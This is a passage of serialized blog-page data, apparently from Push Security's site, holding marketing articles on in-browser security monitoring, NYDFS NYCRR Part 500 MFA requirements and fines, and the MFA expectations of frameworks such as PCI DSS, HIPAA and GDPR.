Traffic shows where data went, not what the user actually saw or did, ",{"data":25907,"marks":25908,"value":25910,"nodeType":173},{},[25909],{"type":370},"and in today’s attacks, that distinction matters.",{"data":25912,"content":25913,"nodeType":178},{},[25914],{"data":25915,"marks":25916,"value":25917,"nodeType":173},{},[],"To stop these threats, you have to see what the user is actually interacting with. Things like what scripts are loading, how the DOM is being manipulated, or whether the login form a user is using is legitimate or being proxied. Those are page-level signals, and they only exist inside the browser tab.",{"data":25919,"content":25923,"nodeType":312},{"target":25920},{"sys":25921},{"id":25922,"type":317,"linkType":318},"6qMaivxhJ3xT9DkwXGcCSJ",[],{"data":25925,"content":25926,"nodeType":178},{},[25927],{"data":25928,"marks":25929,"value":25930,"nodeType":173},{},[],"That same shift applies to control. Destination-based blocking breaks down when the destination itself appears legitimate. Effective intervention requires decisions based on behavior as it unfolds so teams can stop risky or malicious activity that would compromise an account.",{"data":25932,"content":25933,"nodeType":178},{},[25934],{"data":25935,"marks":25936,"value":25937,"nodeType":173},{},[],"And visibility can’t stop at centrally managed applications. Shadow SaaS breaks any assumption that access patterns are uniform or fully governed by the IdP. Local accounts, duplicate identities, and password-only logins don’t show up clearly in network telemetry, but they materially expand the attack surface. Seeing every login, across every app, directly from the browser is the only way to build an accurate picture of who has access to what.",{"data":25939,"content":25940,"nodeType":235},{},[25941],{"data":25942,"marks":25943,"value":25945,"nodeType":173},{},[25944],{"type":370},"Push provides the missing context for network security",{"data":25947,"content":25948,"nodeType":178},{},[25949],{"data":25950,"marks":25951,"value":25952,"nodeType":173},{},[],"At this point, the gap should be clear. Network security gives you strong control over traffic, but very little insight into what actually happens once that traffic lands in a user’s browser.",{"data":25954,"content":25955,"nodeType":178},{},[25956],{"data":25957,"marks":25958,"value":25960,"nodeType":173},{},[25959],{"type":370},"This is where Push can help.",{"data":25962,"content":25963,"nodeType":178},{},[25964],{"data":25965,"marks":25966,"value":25967,"nodeType":173},{},[],"The Push browser agent extends monitoring into the browser itself, providing the visibility and control that perimeter-based tools can’t deliver. It doesn’t replace SSE, SWG, or CASB. Those tools remain the right way to manage traffic and enforce policy at the edge. Push complements them by operating in the one place they can’t: inside the live browser session.",{"data":25969,"content":25970,"nodeType":178},{},[25971],{"data":25972,"marks":25973,"value":25974,"nodeType":173},{},[],"Push does this by deploying a browser-native agent, similar in spirit to how EDR works at the host level. That agent gives defenders direct insight into what the network can’t see like the page being rendered, how the user is interacting with it, and the attack techniques that play out entirely within the tab.",{"data":25976,"content":25977,"nodeType":178},{},[25978],{"data":25979,"marks":25980,"value":25981,"nodeType":173},{},[],"With Push deployed, teams gain:",{"data":25983,"content":25984,"nodeType":250},{},[25985,26000,26015],{"data":25986,"content":25987,"nodeType":254},{},[25988],{"data":25989,"content":25990,"nodeType":178},{},[25991,25996],{"data":25992,"marks":25993,"value":25995,"nodeType":173},{},[25994],{"type":370},"Real-time, in-browser threat detection:",{"data":25997,"marks":25998,"value":25999,"nodeType":173},{},[]," Detect and stop attacks like AiTM phishing and session hijacking based on what’s actually happening in the browser. Instead of relying on blocklists or downstream signals, Push identifies attacker behavior as it unfolds and can intervene before credentials or session tokens are stolen.",{"data":26001,"content":26002,"nodeType":254},{},[26003],{"data":26004,"content":26005,"nodeType":178},{},[26006,26011],{"data":26007,"marks":26008,"value":26010,"nodeType":173},{},[26009],{"type":370},"Complete visibility into SaaS access: ",{"data":26012,"marks":26013,"value":26014,"nodeType":173},{},[],"Build a true inventory of user identities and authentication methods across every application in use, including shadow SaaS. Push fills the gaps left by network and IdP logs, giving teams a real picture of where access exists and how it’s being granted.",{"data":26016,"content":26017,"nodeType":254},{},[26018],{"data":26019,"content":26020,"nodeType":178},{},[26021,26026],{"data":26022,"marks":26023,"value":26025,"nodeType":173},{},[26024],{"type":370},"Streamlined hardening at the point of access:",{"data":26027,"marks":26028,"value":26029,"nodeType":173},{},[]," Use the browser as a control point to enforce secure login behavior everywhere it matters. Mandate MFA, steer users toward SSO, and block risky credentials on unmanaged apps, shifting from reactive cleanup to continuous, preventative hardening.",{"data":26031,"content":26032,"nodeType":178},{},[26033,26037],{"data":26034,"marks":26035,"value":26036,"nodeType":173},{},[],"The result is a unified model and real defense in depth. ",{"data":26038,"marks":26039,"value":26041,"nodeType":173},{},[26040],{"type":370},"Network tools secure the pipeline, and Push secures the user moving through it.",{"data":26043,"content":26044,"nodeType":3769},{},[26045],{"data":26046,"content":26047,"nodeType":178},{},[26048,26051,26057,26060,26066,26069,26075],{"data":26049,"marks":26050,"value":3925,"nodeType":173},{},[],{"data":26052,"content":26053,"nodeType":186},{"uri":1456},[26054],{"data":26055,"marks":26056,"value":3932,"nodeType":173},{},[],{"data":26058,"marks":26059,"value":2936,"nodeType":173},{},[],{"data":26061,"content":26062,"nodeType":186},{"uri":3941},[26063],{"data":26064,"marks":26065,"value":3944,"nodeType":173},{},[],{"data":26067,"marks":26068,"value":3949,"nodeType":173},{},[],{"data":26070,"content":26071,"nodeType":186},{"uri":1469},[26072],{"data":26073,"marks":26074,"value":1472,"nodeType":173},{},[],{"data":26076,"marks":26077,"value":1477,"nodeType":173},{},[],{"data":26079,"content":26082,"nodeType":312},{"target":26080},{"sys":26081},{"id":25575,"type":317,"linkType":318},[],{"data":26084,"content":26085,"nodeType":178},{},[26086],{"data":26087,"marks":26088,"value":37,"nodeType":173},{},[],"Why network and web traffic only gives you part of the picture when it comes to modern browser-based attacks. ",{"items":26091},[26092,26094],{"sys":26093,"name":505},{"id":504},{"sys":26095,"name":509},{"id":508},{"items":26097},[26098],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":26099},{"url":25597},"content:blog:browser-extension-management-guide.json","blog/browser-extension-management-guide.json","blog/browser-extension-management-guide",{"_path":26104,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":26105,"ogImage":118,"summary":26108,"title":26123,"subtitle":118,"metaTitle":26124,"synopsis":26125,"hashTags":118,"publishedDate":26126,"slug":26127,"tagsCollection":26128,"relatedBlogPostsCollection":26138,"authorsCollection":27245,"content":27249,"_id":28063,"_type":5439,"_source":5440,"_file":28064,"_stem":28065,"_extension":5439},"/blog/cyber-essentials-april-2026-update",{"id":26106,"publishedAt":26107},"40T71ukTt8FYSIuFJCYM8H","2026-02-13T09:59:51.444Z",{"json":26109},{"data":26110,"content":26111,"nodeType":165},{},[26112],{"data":26113,"content":26114,"nodeType":178},{},[26115,26119],{"data":26116,"marks":26117,"value":26118,"nodeType":173},{},[],"Big changes are being made to the Cyber Essentials scheme in 2026 that will significantly change how companies are required to validate compliance. Here’s what you need to know about the changes ",{"data":26120,"marks":26121,"value":26122,"nodeType":173},{},[],"and how Push Security can help you deal with them. ","Cyber Essentials April 2026 update: Mandatory MFA on ALL cloud services (and how Push can help)","Cyber Essentials 2026: Mandatory MFA on ALL cloud services","Big changes are being made to the Cyber Essentials scheme in 2026 that will change how companies must validate compliance. Here’s what you need to know. ","2026-02-12T00:00:00.000Z","cyber-essentials-april-2026-update",{"items":26129},[26130,26134],{"sys":26131,"name":26133},{"id":26132},"1gZi8NrRy2v9OqPV7C4dwD","Risk management",{"sys":26135,"name":26137},{"id":26136},"3pjES4THCIfSAwhGdNwBcy","Identity security",{"items":26139},[26140,26729],{"__typename":1528,"sys":26141,"content":26143,"title":26711,"synopsis":26712,"hashTags":118,"publishedDate":26713,"slug":26714,"tagsCollection":26715,"authorsCollection":26721},{"id":26142},"7pU8f4ojNr8rttiSNS2qSU",{"json":26144},{"data":26145,"content":26146,"nodeType":165},{},[26147,26166,26173,26180,26249,26294,26300,26307,26310,26318,26325,26373,26394,26401,26404,26412,26419,26452,26459,26467,26470,26478,26486,26493,26500,26508,26515,26522,26530,26537,26556,26562,26565,26573,26580,26599,26606,26613,26616,26623,26630,26637,26644,26651,26657,26660,26667,26674,26700,26705],{"data":26148,"content":26149,"nodeType":178},{},[26150,26153,26162],{"data":26151,"marks":26152,"value":5039,"nodeType":173},{},[],{"data":26154,"content":26156,"nodeType":186},{"uri":26155},"https://therecord.media/auto-insurance-companies-fined-ny-state-pre-fill-data-breaches",[26157],{"data":26158,"marks":26159,"value":26161,"nodeType":173},{},[26160],{"type":194},"latest regulatory enforcement",{"data":26163,"marks":26164,"value":26165,"nodeType":173},{},[]," from NYDFS resulted in a total of $14.2m in fines across 8 insurance providers following data breaches that exposed the private information of more than 825,000 people, due to vulnerabilities affecting both its consumer-facing and internal quoting tools. ",{"data":26167,"content":26168,"nodeType":178},{},[26169],{"data":26170,"marks":26171,"value":26172,"nodeType":173},{},[],"Several of the companies did not have multi-factor authentication in place for insurance agents who used the private version of the tool. ",{"data":26174,"content":26175,"nodeType":178},{},[26176],{"data":26177,"marks":26178,"value":26179,"nodeType":173},{},[],"This isn’t the first time that NYDFS has issued fines for missing MFA. NYDFS fined:",{"data":26181,"content":26182,"nodeType":250},{},[26183,26205,26227],{"data":26184,"content":26185,"nodeType":254},{},[26186],{"data":26187,"content":26188,"nodeType":178},{},[26189,26192,26201],{"data":26190,"marks":26191,"value":37,"nodeType":173},{},[],{"data":26193,"content":26195,"nodeType":186},{"uri":26194},"https://therecord.media/new-york-fines-auto-insurers-11-million-leaked-data",[26196],{"data":26197,"marks":26198,"value":26200,"nodeType":173},{},[26199],{"type":194},"Travelers Insurance",{"data":26202,"marks":26203,"value":26204,"nodeType":173},{},[]," $1.55m for failing to enforce MFA on its system used by insurance agents.",{"data":26206,"content":26207,"nodeType":254},{},[26208],{"data":26209,"content":26210,"nodeType":178},{},[26211,26214,26223],{"data":26212,"marks":26213,"value":37,"nodeType":173},{},[],{"data":26215,"content":26217,"nodeType":186},{"uri":26216},"https://www.dfs.ny.gov/reports_and_publications/press_releases/pr202104141",[26218],{"data":26219,"marks":26220,"value":26222,"nodeType":173},{},[26221],{"type":194},"National Securities Corporation",{"data":26224,"marks":26225,"value":26226,"nodeType":173},{},[]," $3m for failing to implement MFA.",{"data":26228,"content":26229,"nodeType":254},{},[26230],{"data":26231,"content":26232,"nodeType":178},{},[26233,26236,26245],{"data":26234,"marks":26235,"value":37,"nodeType":173},{},[],{"data":26237,"content":26239,"nodeType":186},{"uri":26238},"https://www.dfs.ny.gov/system/files/documents/2023/05/ea20230524_co_onemain.pdf",[26240],{"data":26241,"marks":26242,"value":26244,"nodeType":173},{},[26243],{"type":194},"OneMain Financial",{"data":26246,"marks":26247,"value":26248,"nodeType":173},{},[]," $4.2m for working with third-party service providers that did not enforce MFA.",{"data":26250,"content":26251,"nodeType":178},{},[26252,26256,26265,26268,26277,26281,26290],{"data":26253,"marks":26254,"value":26255,"nodeType":173},{},[],"NYDFS is not alone in issuing enforcements for missing MFA. Fines levied under ",{"data":26257,"content":26259,"nodeType":186},{"uri":26258},"https://compliancy-group.com/childrens-hospital-colorado-fined-by-ocr/",[26260],{"data":26261,"marks":26262,"value":26264,"nodeType":173},{},[26263],{"type":194},"HIPAA",{"data":26266,"marks":26267,"value":933,"nodeType":173},{},[],{"data":26269,"content":26271,"nodeType":186},{"uri":26270},"https://ico.org.uk/about-the-ico/media-centre/news-and-blogs/2025/03/software-provider-fined-3m-following-2022-ransomware-attack/",[26272],{"data":26273,"marks":26274,"value":26276,"nodeType":173},{},[26275],{"type":194},"GDPR",{"data":26278,"marks":26279,"value":26280,"nodeType":173},{},[]," have also penalised MFA gaps. There are also recent examples of ",{"data":26282,"content":26284,"nodeType":186},{"uri":26283},"https://www.cbc.ca/news/canada/hamilton/cybersecurity-breach-1.7597713",[26285],{"data":26286,"marks":26287,"value":26289,"nodeType":173},{},[26288],{"type":194},"insurance claim denial",{"data":26291,"marks":26292,"value":26293,"nodeType":173},{},[]," due to the lack of MFA. ",{"data":26295,"content":26299,"nodeType":312},{"target":26296},{"sys":26297},{"id":26298,"type":317,"linkType":318},"29fhgKLvjD3OJfJF1ZgC5g",[],{"data":26301,"content":26302,"nodeType":178},{},[26303],{"data":26304,"marks":26305,"value":26306,"nodeType":173},{},[],"This serves as the backdrop for upcoming changes to NYCRR Part 500 that will further tighten the requirements around MFA and asset inventory procedures. ",{"data":26308,"content":26309,"nodeType":231},{},[],{"data":26311,"content":26312,"nodeType":169},{},[26313],{"data":26314,"marks":26315,"value":26317,"nodeType":173},{},[26316],{"type":370},"How NYCRR Part 500 is getting stricter on MFA",{"data":26319,"content":26320,"nodeType":178},{},[26321],{"data":26322,"marks":26323,"value":26324,"nodeType":173},{},[],"As demonstrated by the enforcements relating to MFA gaps, NYCRR Part 500 is already quite strict on its MFA requirements. Section 500.12 mandates MFA for:",{"data":26326,"content":26327,"nodeType":250},{},[26328,26343,26358],{"data":26329,"content":26330,"nodeType":254},{},[26331],{"data":26332,"content":26333,"nodeType":178},{},[26334,26339],{"data":26335,"marks":26336,"value":26338,"nodeType":173},{},[26337],{"type":370},"Remote access to internal systems:",{"data":26340,"marks":26341,"value":26342,"nodeType":173},{},[]," Any user connecting from outside the organization’s network (e.g. over the internet or other external networks) must authenticate with MFA.",{"data":26344,"content":26345,"nodeType":254},{},[26346],{"data":26347,"content":26348,"nodeType":178},{},[26349,26354],{"data":26350,"marks":26351,"value":26353,"nodeType":173},{},[26352],{"type":370},"Remote access to third-party or cloud applications holding non-public information: ",{"data":26355,"marks":26356,"value":26357,"nodeType":173},{},[],"Covered entities must also use MFA for access to external applications (such as cloud services) that contain non-public Information. NYDFS explicitly considers platforms like Office 365, Google Workspace, Salesforce, AWS/Azure cloud resources, fintech or AI platforms, and any other third-party service provider systems that handle the company’s data as part of a firm’s “internal network”.",{"data":26359,"content":26360,"nodeType":254},{},[26361],{"data":26362,"content":26363,"nodeType":178},{},[26364,26369],{"data":26365,"marks":26366,"value":26368,"nodeType":173},{},[26367],{"type":370},"Privileged accounts: ",{"data":26370,"marks":26371,"value":26372,"nodeType":173},{},[],"MFA is required for all privileged accounts (administrative or elevated privilege accounts) to prevent unauthorized use. ",{"data":26374,"content":26375,"nodeType":178},{},[26376,26380,26385,26389],{"data":26377,"marks":26378,"value":26379,"nodeType":173},{},[],"The changes coming into place on November 1st broaden the scope of MFA to ",{"data":26381,"marks":26382,"value":26384,"nodeType":173},{},[26383],{"type":370},"all access",{"data":26386,"marks":26387,"value":26388,"nodeType":173},{},[],": covered entities must require multi-factor authentication for any individual accessing any of the entity’s information systems, regardless of user type, location, or the sensitivity of the system. In other words, ",{"data":26390,"marks":26391,"value":26393,"nodeType":173},{},[26392],{"type":370},"MFA is no longer limited to remote logins or systems containing non-public information – it now applies enterprise-wide, even for internal or on-premises access and for systems that may not hold sensitive data.",{"data":26395,"content":26396,"nodeType":178},{},[26397],{"data":26398,"marks":26399,"value":26400,"nodeType":173},{},[],"The newly introduced requirement for a maintained and periodically reviewed asset inventory of all information systems also directly impacts the scope of MFA enforcement. NYDFS has consistently included outsourced, third-party, and cloud applications services used by an organization within its scope.",{"data":26402,"content":26403,"nodeType":231},{},[],{"data":26405,"content":26406,"nodeType":169},{},[26407],{"data":26408,"marks":26409,"value":26411,"nodeType":173},{},[26410],{"type":370},"What this means for compliance",{"data":26413,"content":26414,"nodeType":178},{},[26415],{"data":26416,"marks":26417,"value":26418,"nodeType":173},{},[],"To be able to maintain compliance with NYCRR Part 500, organizations must:",{"data":26420,"content":26421,"nodeType":250},{},[26422,26432,26442],{"data":26423,"content":26424,"nodeType":254},{},[26425],{"data":26426,"content":26427,"nodeType":178},{},[26428],{"data":26429,"marks":26430,"value":26431,"nodeType":173},{},[],"Inventory all apps and services that are accessed over the internet.",{"data":26433,"content":26434,"nodeType":254},{},[26435],{"data":26436,"content":26437,"nodeType":178},{},[26438],{"data":26439,"marks":26440,"value":26441,"nodeType":173},{},[],"Achieve MFA compliance across all apps. ",{"data":26443,"content":26444,"nodeType":254},{},[26445],{"data":26446,"content":26447,"nodeType":178},{},[26448],{"data":26449,"marks":26450,"value":26451,"nodeType":173},{},[],"Regularly demonstrate an up-to-date app inventory and MFA coverage. ",{"data":26453,"content":26454,"nodeType":178},{},[26455],{"data":26456,"marks":26457,"value":26458,"nodeType":173},{},[],"If this cannot be achieved or a breach occurs that demonstrates inadequate visibility or coverage, precedent indicates that regulatory enforcement will follow. ",{"data":26460,"content":26461,"nodeType":178},{},[26462],{"data":26463,"marks":26464,"value":26466,"nodeType":173},{},[26465],{"type":370},"Unfortunately, this is easier said than done for most organizations. ",{"data":26468,"content":26469,"nodeType":231},{},[],{"data":26471,"content":26472,"nodeType":169},{},[26473],{"data":26474,"marks":26475,"value":26477,"nodeType":173},{},[26476],{"type":370},"Why is this a problem?",{"data":26479,"content":26480,"nodeType":235},{},[26481],{"data":26482,"marks":26483,"value":26485,"nodeType":173},{},[26484],{"type":370},"App sprawl and shadow SaaS",{"data":26487,"content":26488,"nodeType":178},{},[26489],{"data":26490,"marks":26491,"value":26492,"nodeType":173},{},[],"Most organizations now use hundreds of SaaS applications, which translates into thousands of sprawling user identities, login methods, and ways to access company systems and data. True MFA coverage expands beyond your centrally managed, SSO-connected apps or your primary enterprise login to any and every app used by your employees for work.",{"data":26494,"content":26495,"nodeType":178},{},[26496],{"data":26497,"marks":26498,"value":26499,"nodeType":173},{},[],"But with many apps not directly managed by IT or properly onboarded, it’s all too common for shadow apps to sit outside the scope of typical audits — but inside the reach of attackers.",{"data":26501,"content":26502,"nodeType":235},{},[26503],{"data":26504,"marks":26505,"value":26507,"nodeType":173},{},[26506],{"type":370},"Configuration challenges",{"data":26509,"content":26510,"nodeType":178},{},[26511],{"data":26512,"marks":26513,"value":26514,"nodeType":173},{},[],"Even when apps are known about, each app is built differently. Design choices can have a big impact on how authentication and account management is handled. This leads to situations where, for example, apps allow simultaneous login methods, don’t provide admin-level controls to enforce MFA, or allow account config changes on behalf of users in your app tenant.",{"data":26516,"content":26517,"nodeType":178},{},[26518],{"data":26519,"marks":26520,"value":26521,"nodeType":173},{},[],"This isn’t just an app sprawl problem either — even when it comes to core environments the complexities of configuration can lead to coverage gaps. Anyone that’s had to manage group policy in Microsoft, for example, can attest to how convoluted and error-prone this is. ",{"data":26523,"content":26524,"nodeType":235},{},[26525],{"data":26526,"marks":26527,"value":26529,"nodeType":173},{},[26528],{"type":370},"Ghost logins",{"data":26531,"content":26532,"nodeType":178},{},[26533],{"data":26534,"marks":26535,"value":26536,"nodeType":173},{},[],"When an app is first used, particularly if self-adopted, a username and password is typically created. Even when an SSO login is created, it’s usually added on top of password authentication instead of replacing it. And unless specifically disabled or removed, these password-based login methods can continue to be used. ",{"data":26538,"content":26539,"nodeType":178},{},[26540,26544,26552],{"data":26541,"marks":26542,"value":26543,"nodeType":173},{},[],"Because most organizations rely on configuring MFA at their IdP login, local logins without MFA can go unnoticed. These “ghost logins” can lead to unexpected MFA gaps that leave accounts exposed. According to Push data, ",{"data":26545,"content":26546,"nodeType":186},{"uri":4492},[26547],{"data":26548,"marks":26549,"value":26551,"nodeType":173},{},[26550],{"type":194},"2 in 5 accounts are missing MFA",{"data":26553,"marks":26554,"value":26555,"nodeType":173},{},[],", and many also have a password vulnerability (such as appearing in a password breach or compromised credential feed) that means they’re sitting ducks for an attacker, waiting to be exploited.",{"data":26557,"content":26561,"nodeType":312},{"target":26558},{"sys":26559},{"id":26560,"type":317,"linkType":318},"3ZLHFb7DD3Q3f8oH5f3l9X",[],{"data":26563,"content":26564,"nodeType":231},{},[],{"data":26566,"content":26567,"nodeType":169},{},[26568],{"data":26569,"marks":26570,"value":26572,"nodeType":173},{},[26571],{"type":370},"The future of compliance",{"data":26574,"content":26575,"nodeType":178},{},[26576],{"data":26577,"marks":26578,"value":26579,"nodeType":173},{},[],"NYDFS is leading the way in terms of its stance on MFA and understanding of the modern, decentralized, SaaS-centric IT landscape. But they’re not alone, and other regulators will follow suit as breaches continue to dominate the headlines. ",{"data":26581,"content":26582,"nodeType":178},{},[26583,26587,26595],{"data":26584,"marks":26585,"value":26586,"nodeType":173},{},[],"It can take a while for a major breach to translate into regulatory enforcement. ",{"data":26588,"content":26589,"nodeType":186},{"uri":819},[26590],{"data":26591,"marks":26592,"value":26594,"nodeType":173},{},[26593],{"type":194},"2024’s Snowflake breaches",{"data":26596,"marks":26597,"value":26598,"nodeType":173},{},[]," are a great example of this. Attackers exploited widespread MFA gaps to log into customer Snowflake tenants and steal hundreds of millions of customer records. This was made worse by the fact that the credentials used to access these accounts were found in infostealer credential dumps dating back to 2020 — just sitting around waiting for attackers to exploit them. ",{"data":26600,"content":26601,"nodeType":178},{},[26602],{"data":26603,"marks":26604,"value":26605,"nodeType":173},{},[],"In the wake of Snowflake, multiple regulatory bodies have yet to make a judgement. The Spanish data protection authority (AEPD), the U.S. FCC, FTC, and various state data protection authorities all have investigations ongoing, with class action lawsuits also taking place against many of the impacted businesses. ",{"data":26607,"content":26608,"nodeType":178},{},[26609],{"data":26610,"marks":26611,"value":26612,"nodeType":173},{},[],"As we’ve seen with NYDFS’s post-breach enforcement, even if you think you’ve complied by rolling out MFA at the application level, but still have vulnerable accounts, you will be penalised in the event of a breach. This is why a policy or control based view of MFA compliance is no longer sufficient — you need to be able to audit and validate MFA configuration at the account level.",{"data":26614,"content":26615,"nodeType":231},{},[],{"data":26617,"content":26618,"nodeType":169},{},[26619],{"data":26620,"marks":26621,"value":11718,"nodeType":173},{},[26622],{"type":370},{"data":26624,"content":26625,"nodeType":178},{},[26626],{"data":26627,"marks":26628,"value":26629,"nodeType":173},{},[],"Push Security’s browser-based security platform observes logins directly in employee browsers, building a comprehensive picture of user identities and login methods across every app.",{"data":26631,"content":26632,"nodeType":178},{},[26633],{"data":26634,"marks":26635,"value":26636,"nodeType":173},{},[],"Push shows you every app your employees are using (even the unmanaged ones you don’t know about), providing detailed information about how users are logging in, and where vulnerabilities exist. This includes accounts missing MFA, where users are logging in with a username and password over SSO, and where a user’s password has appeared in a compromised credential feed. You can also use Push to deliver in-browser guidance to users to prompt them to remediate insecure logins.",{"data":26638,"content":26639,"nodeType":178},{},[26640],{"data":26641,"marks":26642,"value":26643,"nodeType":173},{},[],"With Push, you can build a full picture of your app estate and MFA posture down to the individual account level, with real-time, continuous monitoring of identities to catch and course-correct any drift that could be exploited by attackers — helping you to achieve and maintain compliance with regulations like NYCRR Part 500.",{"data":26645,"content":26646,"nodeType":178},{},[26647],{"data":26648,"marks":26649,"value":26650,"nodeType":173},{},[],"Check out the video below for more information.",{"data":26652,"content":26656,"nodeType":312},{"target":26653},{"sys":26654},{"id":26655,"type":317,"linkType":318},"1axELRNRyXglrf81FEkDhb",[],{"data":26658,"content":26659,"nodeType":231},{},[],{"data":26661,"content":26662,"nodeType":169},{},[26663],{"data":26664,"marks":26665,"value":18605,"nodeType":173},{},[26666],{"type":370},{"data":26668,"content":26669,"nodeType":178},{},[26670],{"data":26671,"marks":26672,"value":26673,"nodeType":173},{},[],"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",{"data":26675,"content":26676,"nodeType":178},{},[26677,26680,26687,26690,26697],{"data":26678,"marks":26679,"value":1451,"nodeType":173},{},[],{"data":26681,"content":26682,"nodeType":186},{"uri":1456},[26683],{"data":26684,"marks":26685,"value":1459,"nodeType":173},{},[26686],{"type":194},{"data":26688,"marks":26689,"value":1464,"nodeType":173},{},[],{"data":26691,"content":26692,"nodeType":186},{"uri":1469},[26693],{"data":26694,"marks":26695,"value":1472,"nodeType":173},{},[26696],{"type":194},{"data":26698,"marks":26699,"value":1477,"nodeType":173},{},[],{"data":26701,"content":26704,"nodeType":312},{"target":26702},{"sys":26703},{"id":26298,"type":317,"linkType":318},[],{"data":26706,"content":26707,"nodeType":178},{},[26708],{"data":26709,"marks":26710,"value":37,"nodeType":173},{},[],"What the expansion of NYCRR Part 500 means for MFA regulation and compliance","NYCRR Part 500 is tightening its MFA and asset management requirements. Here's what the changes means for compliance. ","2025-10-31T00:00:00.000Z","what-the-expansion-of-nydfs-nycrr-part-500-means-for-mfa-compliance",{"items":26716},[26717,26719],{"sys":26718,"name":26133},{"id":26132},{"sys":26720,"name":505},{"id":504},{"items":26722},[26723],{"fullName":26724,"firstName":26725,"jobTitle":26726,"profilePicture":26727},"Mark Orlando","Mark","Field CTO",{"url":26728},"https://images.ctfassets.net/y1cdw1ablpvd/592PMwIQQFaa24k5SKBEKF/a33090d0ad95d1e3081f5d16a46ba826/image__68_.png",{"__typename":1528,"sys":26730,"content":26732,"title":27231,"synopsis":27232,"hashTags":118,"publishedDate":27233,"slug":27234,"tagsCollection":27235,"authorsCollection":27241},{"id":26731},"3YXrPQptEX3P0Hrd550its",{"json":26733},{"nodeType":165,"data":26734,"content":26735},{},[26736,26743,26761,26768,26771,26779,26786,26793,26917,26924,26930,26933,26941,26948,26955,26962,26969,26977,26984,26991,26994,27002,27009,27016,27023,27029,27036,27064,27074,27080,27083,27090,27098,27105,27138,27143,27149,27155,27158,27166,27173,27192,27198,27205],{"nodeType":178,"data":26737,"content":26738},{},[26739],{"nodeType":173,"value":26740,"marks":26741,"data":26742},"Many security leaders would confidently say they have MFA deployed everywhere. But that confidence often disappears when a breach investigation begins. The reality? MFA coverage is far from complete.",[],{},{"nodeType":178,"data":26744,"content":26745},{},[26746,26750,26758],{"nodeType":173,"value":26747,"marks":26748,"data":26749},"MFA is inconsistently enforced across the modern identity surface. Logins without MFA frequently slip through the cracks, exposing critical access points to business systems and data. And attackers know it — as they demonstrated best in ",[],{},{"nodeType":186,"data":26751,"content":26752},{"uri":819},[26753],{"nodeType":173,"value":26754,"marks":26755,"data":26757},"2024's infamous Snowflake breaches",[26756],{"type":194},{},{"nodeType":173,"value":197,"marks":26759,"data":26760},[],{},{"nodeType":178,"data":26762,"content":26763},{},[26764],{"nodeType":173,"value":26765,"marks":26766,"data":26767},"Regulators and insurers are catching on, too. Where MFA was once considered best practice, it’s now an expectation; implied in some frameworks, explicitly required in others, and enforced more aggressively than ever before. Whether you’re trying to meet PCI DSS, HIPAA, or GDPR requirements, the question is no longer if you have MFA, it’s where and how it’s enforced — and can you prove it?",[],{},{"nodeType":231,"data":26769,"content":26770},{},[],{"nodeType":169,"data":26772,"content":26773},{},[26774],{"nodeType":173,"value":26775,"marks":26776,"data":26778},"Framework-by-framework breakdown: what they really say about MFA",[26777],{"type":370},{},{"nodeType":178,"data":26780,"content":26781},{},[26782],{"nodeType":173,"value":26783,"marks":26784,"data":26785},"MFA isn’t just a checkbox. It’s a regulatory expectation. While some frameworks spell that out clearly, others imply it in broader language. Either way, the enforcement trend is undeniable: organizations are being held accountable if MFA is missing.",[],{},{"nodeType":178,"data":26787,"content":26788},{},[26789],{"nodeType":173,"value":26790,"marks":26791,"data":26792},"Here’s how key frameworks treat MFA today:",[],{},{"nodeType":250,"data":26794,"content":26795},{},[26796,26806,26828,26850,26897,26907],{"nodeType":254,"data":26797,"content":26798},{},[26799],{"nodeType":178,"data":26800,"content":26801},{},[26802],{"nodeType":173,"value":26803,"marks":26804,"data":26805},"PCI DSS v4.0 requires mandatory MFA for all non-console administrative access and remote access to cardholder environments.",[],{},{"nodeType":254,"data":26807,"content":26808},{},[26809],{"nodeType":178,"data":26810,"content":26811},{},[26812,26816,26824],{"nodeType":173,"value":26813,"marks":26814,"data":26815},"HIPAA doesn’t use the term “MFA” directly, but under the Security Rule, it mandates “reasonable and appropriate safeguards,” and the absence of MFA has led to audit findings and penalties — e.g. a US children’s hospital received a ",[],{},{"nodeType":186,"data":26817,"content":26818},{"uri":26258},[26819],{"nodeType":173,"value":26820,"marks":26821,"data":26823},"$500,000",[26822],{"type":194},{},{"nodeType":173,"value":26825,"marks":26826,"data":26827}," HIPAA fine for insufficient MFA.",[],{},{"nodeType":254,"data":26829,"content":26830},{},[26831],{"nodeType":178,"data":26832,"content":26833},{},[26834,26838,26846],{"nodeType":173,"value":26835,"marks":26836,"data":26837},"GDPR similarly focuses on “appropriate technical measures.” In 2023, the UK’s ICO fined a UK software company ",[],{},{"nodeType":186,"data":26839,"content":26840},{"uri":26270},[26841],{"nodeType":173,"value":26842,"marks":26843,"data":26845},"£3.07 million",[26844],{"type":194},{},{"nodeType":173,"value":26847,"marks":26848,"data":26849}," for a breach involving missing MFA, setting a clear precedent.",[],{},{"nodeType":254,"data":26851,"content":26852},{},[26853],{"nodeType":178,"data":26854,"content":26855},{},[26856,26860,26868,26872,26880,26884,26893],{"nodeType":173,"value":26857,"marks":26858,"data":26859},"NYDFS 500 is clear: MFA is required for all user access to covered systems, not just privileged accounts. MFA gaps resulted in a ",[],{},{"nodeType":186,"data":26861,"content":26862},{"uri":26216},[26863],{"nodeType":173,"value":26864,"marks":26865,"data":26867},"$3 million settlement",[26866],{"type":194},{},{"nodeType":173,"value":26869,"marks":26870,"data":26871}," against a financial services company, a ",[],{},{"nodeType":186,"data":26873,"content":26874},{"uri":26238},[26875],{"nodeType":173,"value":26876,"marks":26877,"data":26879},"$4.2 million",[26878],{"type":194},{},{"nodeType":173,"value":26881,"marks":26882,"data":26883}," dollar fine against a personal loan provider, and a ",[],{},{"nodeType":186,"data":26885,"content":26887},{"uri":26886},"https://www.dfs.ny.gov/reports_and_publications/press_releases/pr20241125",[26888],{"nodeType":173,"value":26889,"marks":26890,"data":26892},"$1.55 million",[26891],{"type":194},{},{"nodeType":173,"value":26894,"marks":26895,"data":26896}," fine against an auto insurer.",[],{},{"nodeType":254,"data":26898,"content":26899},{},[26900],{"nodeType":178,"data":26901,"content":26902},{},[26903],{"nodeType":173,"value":26904,"marks":26905,"data":26906},"NIST SP 800-63-3 and CISA’s EO 